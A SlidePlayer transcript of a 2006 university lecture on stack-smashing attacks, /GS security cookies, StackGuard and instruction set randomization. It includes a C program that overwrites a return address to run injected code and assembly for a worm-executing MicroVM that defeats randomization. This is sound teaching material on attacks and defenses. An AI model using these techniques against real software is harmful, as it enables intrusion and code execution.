CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional.

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Machine/Assembler Language Putting It All Together Noah Mendelsohn Tufts University Web:
C Programming and Assembly Language Janakiraman V – NITK Surathkal 2 nd August 2014.
Assembly Language for Intel-Based Computers Chapter 8: Advanced Procedures Kip R. Irvine.
University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.
Assembly Language for Intel-Based Computers Chapter 5: Procedures Kip R. Irvine.
1 Lecture 5: Procedures Assembly Language for Intel-Based Computers, 4th edition Kip R. Irvine.
Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Accessing parameters from the stack and calling functions.
Practical Session 3. The Stack The stack is an area in memory that its purpose is to provide a space for temporary storage of addresses and data items.
1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
CS2422 Assembly Language and System Programming High-Level Language Interface Department of Computer Science National Tsing Hua University.
David Evans CS201j: Engineering Software University of Virginia Computer Science Lecture 18: 0xCAFEBABE (Java Byte Codes)
Computer Architecture and Operating Systems CS 3230 :Assembly Section Lecture 7 Department of Computer Science and Software Engineering University of Wisconsin-Platteville.
Today’s topics Parameter passing on the system stack Parameter passing on the system stack Register indirect and base-indexed addressing modes Register.
University of Washington Today More on procedures, stack etc. Lab 2 due today!  We hope it was fun! What is a stack?  And how about a stack frame? 1.
Code Generation Gülfem Savrun Yeniçeri CS 142 (b) 02/26/2013.
Practical Session 4. Labels Definition - advanced label: (pseudo) instruction operands ; comment valid characters in labels are: letters, numbers, _,
Assembly Language for Intel-Based Computers, 6 th Edition Chapter 8: Advanced Procedures (c) Pearson Education, All rights reserved. You may.
N-Variant Systems A Secretless Framework for Security through Diversity Institute of Software Chinese Academy of Sciences 29 May 2006 David Evans
Security through Diversity MIT (a “UVa-spinoff University”) 23 June 2005 David Evans University of Virginia Computer Science.
The N-Variant Systems Framework Polygraphing Processes for Secretless Security University of Texas at San Antonio 4 October 2005 David Evans
Recitation 2 – 2/11/02 Outline Stacks & Procedures Homogenous Data –Arrays –Nested Arrays Mengzhi Wang Office Hours: Thursday.
Today’s topics Procedures Procedures Passing values to/from procedures Passing values to/from procedures Saving registers Saving registers Documenting.
Sahar Mosleh California State University San MarcosPage 1 Nested Procedure calls and Flowcharts.
Where’s the FEEB? Effectiveness of Instruction Set Randomization CERIAS Security Seminar Purdue University 9 March 2005 David Evans University of Virginia.
CSC 221 Computer Organization and Assembly Language
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 21: Calling.
Where’s the FEEB?: Effectiveness of Instruction Set Randomization Nora Sovarel, David Evans, Nate Paul University of Virginia Computer Science USENIX Security.
Stack Usage with MS Visual Studio Without Stack Protection.
1 Assembly Language: Function Calls Jennifer Rexford.
CSC 221 Computer Organization and Assembly Language Lecture 16: Procedures.
CSC 221 Computer Organization and Assembly Language Lecture 15: STACK Related Instructions.
ICS51 Introductory Computer Organization Accessing parameters from the stack and calling functions.
Practical Session 3.
Recitation 3: Procedures and the Stack
Stack Operations Dr. Hadi AL Saadi.
Reading Condition Codes (Cont.)
Computer Architecture and Assembly Language
Introduction to Information Security
C function call conventions and the stack
Computer Architecture and Assembly Language
Exploiting & Defense Day 2 Recap
Aaron Miller David Cohen Spring 2011
Writing a Useful Program With NASM
Homework In-line Assembly Code Machine Language
Introduction to Compilers Tim Teitelbaum
High-Level Language Interface
Machine-Level Programming 4 Procedures
Stealing Secrets and Secretless Security Structures
Stack Frames and Advanced Procedures
Procedures – Overview Lecture 19 Mon, Mar 28, 2005.
Assembly Language Programming II: C Compiler Calling Sequences
Lecture 19: 0xCAFEBABE (Java Byte Codes) CS201j: Engineering Software
Machine-Level Programming III: Procedures Sept 18, 2001
Practical Session 4.
EECE.3170 Microprocessor Systems Design I
EECE.3170 Microprocessor Systems Design I
Multi-modules programming
X86 Assembly Review.
Low-Level Thread Dispatching on the x86
ICS51 Introductory Computer Organization
Computer Architecture and System Programming Laboratory
Computer Architecture and System Programming Laboratory
Computer Architecture and System Programming Laboratory
Presentation transcript:

CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional Calling

2 UVa CS216 Spring Lecture 22: Unconventional Calling Menu Stack Smashing Attacks and Defenses ISR De-Randomizing MicroVM

3 UVa CS216 Spring Lecture 22: Unconventional Calling parameter 3 parameter 2 parameter 1 return address saved EBP local variable 1 local variable 2 local variable 3 saved EDI saved ESI Higher Addresses Stack Growth EBP ESP [ebp]+8 [ebp]+12 [ebp]+16 [ebp]-4

4 UVa CS216 Spring Lecture 22: Unconventional Calling Pathological C Program void pathological () { char a[4] = "abcd"; char *adr; int val; val = 8; /* Saved EBP */ /* return address <- location of a[16] */ a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] <- JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; } int main (int argc, char **argv) { pathological (); printf ("Hello\n"); return EXIT_SUCCESS; }

5 UVa CS216 Spring Lecture 22: Unconventional Calling

6 a[0] return address

7 UVa CS216 Spring Lecture 22: Unconventional Calling a[0] void pathological () { char a[4] = "abcd"; char *adr; int val; val = 8; a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] <- JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; }

8 UVa CS216 Spring Lecture 22: Unconventional Calling D mov edx,dword ptr [val] mov byte ptr [ebp+edx+3],0 } mov esp,ebp pop ebp ret 0012FEE4 jmp 0012FEE4

9 UVa CS216 Spring Lecture 22: Unconventional Calling /GS

10 UVa CS216 Spring Lecture 22: Unconventional Calling /GS Option The compiler injects checks in functions with local string buffers or, on x86, functions with exception handling. A string buffer is defined as an array whose element size is one or two bytes, and where the size of the whole array is at least five bytes, or, any buffer allocated with _alloca._alloca

11 UVa CS216 Spring Lecture 22: Unconventional Calling With /GS void pathological () { char a[5] = "abcd";

12 UVa CS216 Spring Lecture 22: Unconventional Calling Security Cookies void pathological () { push ebp mov ebp,esp sub esp,14h mov eax,dword ptr [___security_cookie (408060h)] B mov dword ptr [ebp-8],eax B mov eax,dword ptr [val] E mov byte ptr [ebp+eax-5],0 } A3 mov ecx,dword ptr [ebp-8] A6 call __security_check_cookie (40111Eh) AB mov esp,ebp AD pop ebp AE ret

13 UVa CS216 Spring Lecture 22: Unconventional Calling ebp cookie return address StackGuard implementation ebp canary return address

14 UVa CS216 Spring Lecture 22: Unconventional Calling Cookie Checking void __declspec(naked) __fastcall __security_check_cookie(DWORD_PTR cookie) { /* x86 version written in asm to preserve all regs */ __asm { cmp ecx, __security_cookie E cmp ecx,dword ptr [___security_cookie (408060h)] jne failure jne failure (401127h) ret ret failure: jmp report_failure jmp report_failure (4010EDh)

15 UVa CS216 Spring Lecture 22: Unconventional Calling Does it work? void pathological () { char a[5] = "abcd"; char *adr; int val; printf ("Hello\n"); val = 16; /* return address <- location of a[16] */ a[val+4] = 0xe4; a[val+5] = 0xfe; a[val+6] = 0x12; a[val+7] = 0x00; /* a[16-17] = JMP -2 */ a[val+8] = 0xeb; a[val+9] = 0xfe; a[val+10] = 0x00; a[val+11] = 0x00; }

16 UVa CS216 Spring Lecture 22: Unconventional Calling Works in Practice? Most attacks can’t skip over cookie –Must fill up buffer, instead of directly assigning to locations Lots and lots of other proposed defenses

17 UVa CS216 Spring Lecture 22: Unconventional Calling An Instruction Set Randomizing MicroVM

18 UVa CS216 Spring Lecture 22: Unconventional Calling save worm address in ebp move stack frame pointer WormIP  0 copy worm code into buffer update WormIP save MicroVM registers load worm registers 22-byte worm execution buffer save worm registers load MicroVM registers jmp to read next block saved registers worm code host key masks guessed (target) masks other worm data Learned Key Bytes 76 bytes of code + 22 bytes for execution + 2 bytes to avoid NULL = 100 bytes is enough > 99% of the time MicroVM Worm code must be coded in blocks that fit into execution buffer (pad with noops so instructions do not cross block boundaries)

19 UVa CS216 Spring Lecture 22: Unconventional Calling MicroVM Code push dword ebpmov ebp, WORM_ADDRESS + WORM_REG_OFFSET pop dword [ebp + WORM_DATA_OFFSET] xor eax, eax ; WormIP = 0 (load from ebp + eax) read_more_worm: ; read NUM_BYTES at a time until worm is done cld xor ecx, ecx mov byte cl, NUM_BYTES mov dword esi, WORM_ADDRESS ; get saved WormIP add dword esi, eax mov edi, begin_worm_exec rep movsb; copies next Worm block into execution buffer add eax, NUM_BYTES ; change WormIP pushad ; save register vals mov edi, dword [ebp] ; restore worm registers mov esi, dword [ebp + ESI_OFFSET] mov ebx, dword [ebp + EBX_OFFSET] mov edx, dword [ebp + EDX_OFFSET] mov ecx, dword [ebp + ECX_OFFSET] mov eax, dword [ebp + EAX_OFFSET] begin_worm_exec: ; this is the worm execution buffer nop nop nop nop nop nop nop nop nop nop nop nop mov [ebp], edi; save worm registers mov [ebp + ESI_OFFSET], esi mov [ebp + EBX_OFFSET], ebx mov [ebp + EDX_OFFSET], edx mov [ebp + ECX_OFFSET], ecx mov [ebp + EAX_OFFSET], eax popad ; restore microVM register vals jmp read_more_worm Note: this is nasm x86 assembly code, not masm, so some directives are slightly different

20 UVa CS216 Spring Lecture 22: Unconventional Calling Charge PS7 Due Wednesday –Lots of interesting things to explore Exam 2 will be posted Thursday Next class: review (if you send questions) “x86 Guru” title(s) may be awarded for especially clever answers to Question 10

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.